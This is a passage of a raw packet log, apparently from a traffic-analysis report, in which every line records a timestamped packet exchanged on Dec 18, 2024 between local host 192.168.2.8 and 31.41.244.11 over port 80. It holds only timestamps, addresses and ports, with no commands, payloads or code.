                                                                                                                                                                                          Dec 18, 2024 09:07:18.840281963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.840349913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.840394020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.840987921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841039896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841121912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841167927 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841789961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841836929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841909885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.841960907 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.842443943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.842495918 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.842499018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.842545986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843157053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843206882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843282938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843328953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843843937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843889952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.843988895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.844207048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.844641924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.844686985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.844732046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.844775915 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.845284939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.845329046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.845407963 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.845459938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.845973969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846025944 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846074104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846684933 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846733093 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846795082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.846839905 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.847399950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.847503901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.847506046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.847559929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848118067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848167896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848253965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848299980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848766088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848812103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848869085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.848912001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.849467039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.849526882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.849560976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.849606037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850176096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850224972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850265980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850342035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850795031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850842953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850908995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.850953102 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.851464987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.851537943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.851588964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852135897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852185011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852251053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852294922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852813005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852869034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.852955103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.853012085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.853460073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.853508949 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.853573084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.853626013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854155064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854204893 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854243040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854286909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854826927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854876995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854950905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.854998112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.855432987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.855487108 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.855554104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.855734110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856163979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856214046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856216908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856267929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856748104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856795073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856849909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856884956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856898069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.856925011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857721090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857769012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857774973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857810974 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857815027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.857867002 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.858700991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.858753920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.858756065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.858788967 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.858829021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.859781981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.859885931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.859920025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.859935045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.859962940 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860766888 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860812902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860882998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860918045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860929012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.860964060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862131119 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862181902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862231016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862266064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862279892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.862319946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863049030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863082886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863092899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863128901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863167048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863195896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863867998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863917112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863900900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863951921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863961935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.863997936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.864912033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.864959002 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.864964962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.864999056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865010023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865039110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865542889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865591049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865596056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865648985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865669012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.865689993 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866285086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866328955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866337061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866372108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866379976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.866410971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867336035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867382050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867388010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867422104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867429972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.867460966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868160009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868206024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868252993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868285894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868295908 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.868329048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869045019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869079113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869091988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869115114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869123936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869173050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869654894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869699955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869707108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869755030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869760036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.869807005 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870485067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870532036 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870557070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870590925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870603085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.870635986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871565104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871598959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871613979 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871635914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871637106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.871676922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029429913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029520035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029551029 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029578924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029584885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029620886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029623032 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029623032 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.029658079 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.030292034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.030391932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.030425072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.030440092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.030462027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031126976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031193018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031227112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031238079 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031265974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.031985044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032041073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032099962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032134056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032180071 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032875061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032922029 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032927036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032962084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.032999039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.033746958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.033796072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.033823013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.033858061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.033901930 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034595966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034651995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034682989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034718990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034725904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.034818888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.035535097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.035608053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.035640955 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.035651922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.035676003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.036345005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.036436081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.036469936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.036477089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.036504984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.037204027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.037281990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.037316084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.037321091 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.037488937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038065910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038149118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038182974 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038189888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038677931 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.038947105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039005041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039019108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039052010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039055109 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039176941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039844990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039896965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039915085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039931059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039932013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.039973974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040865898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040918112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040919065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040954113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040955067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.040990114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042004108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042051077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042056084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042129040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042139053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042164087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.042916059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.043001890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.043035984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.043041945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.043981075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044032097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044035912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044070005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044079065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044106960 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044888973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044939041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.044974089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.045010090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.045015097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.045054913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.045912981 CET804971431.41.244.11192.168.2.8
